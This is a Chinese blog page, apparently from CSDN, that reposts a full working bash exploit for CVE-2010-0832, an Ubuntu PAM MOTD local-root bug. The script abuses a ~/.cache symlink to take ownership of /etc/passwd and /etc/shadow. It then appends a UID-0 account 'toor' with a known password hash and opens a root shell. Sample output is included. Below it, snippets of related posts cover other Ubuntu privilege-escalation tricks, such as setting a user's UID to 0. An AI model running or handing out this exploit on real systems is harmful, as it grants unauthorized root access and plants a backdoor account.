ubantu提权

最新推荐文章于 2022-08-17 17:44:10 发布
最新推荐文章于 2022-08-17 17:44:10 发布
阅读量1k 收藏
点赞数
文章标签: ubuntu ssh bash patch user login 
#!/bin/bash
#
# Exploit Title: Ubuntu PAM MOTD local root
# Date: July 9, 2010
# Author: Anonymous
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
# CVE: CVE-2010-0832
# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i
# 
#
# Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.
# Does not prompt for login by creating temporary SSH key and authorized_keys entry.
#
#   user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh
#   [*] Ubuntu PAM MOTD local root
#   [*] Backuped /home/user/.ssh/authorized_keys
#   [*] SSH key set up
#   [*] Backuped /home/user/.cache
#   [*] spawn ssh
#   [+] owned: /etc/passwd
#   [*] spawn ssh
#   [+] owned: /etc/shadow
#   [*] Restored /home/user/.cache
#   [*] Restored /home/user/.ssh/authorized_keys
#   [*] SSH key removed
#   [+] Success! Use password toor to get root
#   Password:
#   root@ubuntu:/home/user# id
#   uid=0(root) gid=0(root) groupes=0(root)
#
P='toor:x:0:0:root:/root:/bin/bash'
S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'
echo "[*] Ubuntu PAM MOTD local root"
[ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1
[ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1
[ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1
backup() {
    [ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak
    [ -e "$1" ] || return 0
    mv "$1"{,.bak} || return 1
    echo "[*] Backuped $1"
}
restore() {
    [ -e "$1" ] && rm -rf "$1"
    [ -e "$1".bak ] || return 0
    mv "$1"{.bak,} || return 1
    echo "[*] Restored $1"
}
key_create() {
    backup ~/.ssh/authorized_keys
    ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1
    [ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; }
    mv "$KEY.pub" ~/.ssh/authorized_keys || return 1
    echo "[*] SSH key set up"
}
key_remove() {
    rm -f "$KEY"
    restore ~/.ssh/authorized_keys
    echo "[*] SSH key removed"
}
own() {
    [ -e ~/.cache ] && rm -rf ~/.cache
    ln -s "$1" ~/.cache || return 1
    echo "[*] spawn ssh"
    ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true
    [ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; }
    echo "[+] owned: $1"
}
bye() {
    key_remove
    exit 1
}
KEY="$(mktemp -u)"
key_create || { echo "[-] Failed to setup SSH key"; exit 1; }
backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; }
own /etc/passwd && echo "$P" >> /etc/passwd
own /etc/shadow && echo "$S" >> /etc/shadow
restore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; }
key_remove
echo "[+] Success! Use password toor to get root"
su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; /
  chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor
cnbird2008
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
117.网络安全渗透测试—[权限提升篇15]—[Ubuntu15.04 Metasploit提权]
qwsn
07-08 3712
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。php马: elf马:#msfconsole,开启Metasploit控制台 如下图所示,我们首先上传shellx.php攻击载荷到靶机:
Ubuntu内核提权(CVE-2017-16995)
weixin_68652890的博客
04-15 770
内核提权 环境: 墨者靶场 工具 msf linux-exploit-suggester-master xshell 利用 xshell连接发现是hack权限 上传linux-exploit-suggester.sh到服务器 Possible Exploits:   CVE-2017-16995   CVE-2016-5195 CVE-2016-5195也可以利用 我们这里利用CVE-2017-16995进行提权 影响 CVE-2017-16995 Linux
Ubuntu Linux 12.04 LTS amd64系统本地root提权
aod83029的博客
04-13 298
URL:http://www.ichunqiu.com/section/173 由于fusermount二进制调用setuid的(geteuid())重置RUID时,它调用/bin/mount才能使用的特权挂载选项,通常是限制的。 但是,如果RUID!= euid ,ruid(实际用户ID,指的是进程执行者), euid( 有效用户ID,指进程执行时对文件的访问权限),...
Ubuntu 本地内核提权 (CVE-2017-16995)
震山的博客
08-07 1516
Ubuntu 本地提权再现
Ubuntu 用户提权到Root
星星的专栏
10-25 3938
提升的方法如下:在shell里面输入  sudo gedit /etc/passwd   将里面的当前用户的ID值进行修改。譬如我的当前用户是chenjieb 则找到了   chenjieb:x:1000:1000:Administrator,,,:/home.chenjieb:/bin/bash   将两个1000改成0即可。即最后改完的结果为:   chenjieb:x:0:0:A
hackthebox-node(考点:node.js/ubantu提权)
冬萍子癸水
04-12 530
nmap 只有3000端口可以利用,http://10.10.10.58:3000 进去看没什么有价值的,dirbuster扫也扫不出来啥。这个时候可以用ctrl+u进去,查看js里的登录信息或者burp抓一下,看有何发现。 发现api/users 再用这个路径进http看。 就出来了账号信息,很明显第一个就是管理员 那个管理员的密码MD5或hash,并不复杂,就是单纯的字母数字,这种我习惯...
内网渗透常用提权方式总结
j1044957016的博客
06-01 7554
内网菜鸡艰难学习,希望一样的菜鸡能省去打开一堆链接的时间吧
〖EXP〗Ubuntu 18.04提权Linux 4.10 < 5.1.17 (CVE-2019-13272)
K8哥哥
01-21 3929
简介 Ubuntu 18.04 提权Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272) 测试 // Tested on: // - Ubuntu 16.04.5 kernel 4.15.0-29-generic // - Ubuntu 18.04.1 kernel 4.15.0-20-generic // - Ubuntu 19.04 kernel 5.0.0-15-generic // - Ubuntu Mate 18.04.
kali对ubuntu16.04提权测试
blog-darcygail
08-17 522
ubuntu本地poc漏洞提权
Ubuntu 16.04.2提权
热门推荐
March
01-29 1万+
系统版本为Ubuntu14.04.5 cat /etc/issue Ubuntu 14.04.5 LTS 查看当前权限 id uid=33(www-data) gid=33(www-data) groups=33(www-data) 网上搜一下有没有exp,然后找到一位博主,下载链接为:https://cyseclabs.com/exploits/upstream44.c 因为用户权限过低,无法在...
QT生成的EXE文件自动申请管理员权限
清晨的光明
12-28 1473
一、项目中配置 方法一:mingw编译器 在QT的pro工程文件中加入: RC_FILE=main.rc 新建一个rc文件,main.rc文件内容如下: IDI_ICON1 ICON DISCARDABLE "./res/logo.ico" 1 24 uac.manifest 其中,第一行是为程序添加icon的,第二行是增加权限,注意是manifest。 新建一个manifest文件,uac.manifest 文件内容如下: <?xml version='1.0' encod..
Qt|总结几种在Linux系统下获取root权限的方法
kllo__的博客
10-21 3944
本质上,都只是暂时获得root权限去执行,命令,一般是使用sudo 但是sudo需要输入密码,下面是不用输入密码的办法 process->start(("sh -c \"echo "+password+" | 要执行的命令").toLatin1());
qt提权
weixin_34221773的博客
06-22 497
2019独角兽企业重金招聘Python工程师标准>>> ...
pexpect模块pxsshlogin()函数源代码
polaris_119的专栏
05-08 1055
pexpect模块pxssh类源代码 SSH登录指定的主机。 def login (self, server, username=None, password='', terminal_type='ansi', original_prompt=r"[#$]", login_timeout=10, port=None, ...
ssh证书登录(实例详解)
weixin_34336526的博客
08-19 973
前言 本文基于实际Linux管理工作,实例讲解工作中使用ssh证书登录的实际流程,讲解ssh证书登录的配置原理,基于配置原理,解决实际工作中,windows下使用SecureCRT证书登录的各种问题,以及实现hadoop集群部署要求的无密码跳转问题。 ssh有密码登录和证书登录,初学者都喜欢用密码登录,甚至是root账户登录,密码是123456。但是在实际工作中,尤其是互联网公司,基本都是证书...
Ubuntu用户提权到Root
skysys的研究小屋
03-12 3322
在shell里面输入 sudo vim /etc/passwd 将里面的当前用户的ID值进行修改。譬如我的当前用户是chenjieb 则找到了 chenjieb:x:1000:1000:Administrator,,,:/home.chenjieb:/bin/bash 将两个1000改成0即可。即最后改完的结果为: chenjieb:x:0:0:Administrator,,,:/home.chenjieb:/bin/bash 最后将Ubuntu系统进行注销,然后在登陆的用户名里输入 你自己的用
CVE-2015-1328 Ubuntu 12.04, 14.04, 14.10, 15.04 overlayfs Local Root
weixin_34112181的博客
06-25 356
catalog 0. 引言 1. Description 2. Effected Scope 3. Exploit Analysis 4. Principle Of Vulnerability 5. Patch Fix   0. 引言 新技术、高性能技术的不断发展,越来越提升了操作系统的能力,而近几年出现的虚拟化技术,包括overlayfs虚拟层叠文件系统技术,则为doc...
CVE-2017-16995————Ubuntu本地提权漏洞
Fly_鹏程万里
05-15 4807
前言近期看到了Ubuntu本地提权漏洞所以顺手演示一份,实践一波!漏洞描述Ubuntu是一个以桌面应用为主的开源GNU/Linux操作系统,基于Debian GNU/Linux 。近期有白帽子爆出 ubuntu 的最新版本(Ubuntu 16.04)存在本地提权漏洞,漏洞编号为CVE-2017-16995。该漏洞存在于调用eBPF bpf(2)的Linux内核系统中,当用户提供恶意BPF程序使eB...
ubantu linux
最新发布
09-27
Ubantu Linux是一个基于Debian的开源操作系统,它主要用于个人电脑、移动设备和云端服务器。它具有强大的安全性和稳定性,并且支持多种桌面环境和应用程序。有许多不同的版本可供选择,包括Ubuntu Desktop、Ubuntu ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值